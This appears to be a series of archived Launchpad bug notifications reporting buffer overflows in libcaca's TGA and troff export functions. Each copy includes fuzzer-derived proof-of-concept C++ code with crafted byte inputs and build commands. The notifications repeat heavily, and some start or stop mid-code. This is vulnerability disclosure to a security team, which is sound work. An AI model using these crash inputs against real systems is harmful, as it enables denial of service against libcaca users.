{0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));

 return 0;

  }
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"tga",);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;
 return 0;
  }

  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 

[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

2021-04-11 Thread xiao huang
** Summary changed:

- libcaca buffer-overflow
+ buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
  export_troff

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello Ubuntu Security Team
  I use libfuzzer to test libcaca api .I found two crash

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code file(As call stack):

 ->caca_export_canvas_to_memory()  in
  libcaca/caca/codec/export.c

 ->caca_export_memory()in
  libcaca/caca/codec/export.c

 -> export_tga()in  
libcaca/caca/codec/export.c

-> export_troff()   in  
libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"troff",);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;

  }

  
  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));

 return 0;

  }
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"tga",);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;
 return 0;
  }

  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 

[Touch-packages] [Bug 1923273] Re: libcaca buffer-overflow

2021-04-10 Thread xiao huang
Debian 10
libcaca0/now 0.9.beta19-2.1

Fedora 33
Name: libcaca 
version : 0.99 
Release :0.51.beta19.fc33

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273

Title:
  libcaca buffer-overflow

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello Ubuntu Security Team
  I use libfuzzer to test libcaca api .I found two crash

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code file(As call stack):

 ->caca_export_canvas_to_memory()  in
  libcaca/caca/codec/export.c

 ->caca_export_memory()in
  libcaca/caca/codec/export.c

 -> export_tga()in  
libcaca/caca/codec/export.c

-> export_troff()   in  
libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"troff",);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;

  }

  
  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));

 return 0;

  }
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"tga",);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;
 return 0;
  }

  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));

 return 0;
  }
  EOF

  clang++ -g 

[Touch-packages] [Bug 1923273] Re: libcaca buffer-overflow

2021-04-10 Thread xiao huang
source code
## Affected Product Code Base
libcaca, 0.99.beta20


Ubuntu 20.04
libcaca 0.99.beta19

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273

Title:
  libcaca buffer-overflow

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello Ubuntu Security Team
  I use libfuzzer to test libcaca api .I found two crash

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code file(As call stack):

 ->caca_export_canvas_to_memory()  in
  libcaca/caca/codec/export.c

 ->caca_export_memory()in
  libcaca/caca/codec/export.c

 -> export_tga()in  
libcaca/caca/codec/export.c

-> export_troff()   in  
libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"troff",);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;

  }

  
  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));

 return 0;

  }
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"tga",);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;
 return 0;
  }

  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));

 return 0;
  }
  EOF

  clang++ -g poc_tga.cc -O2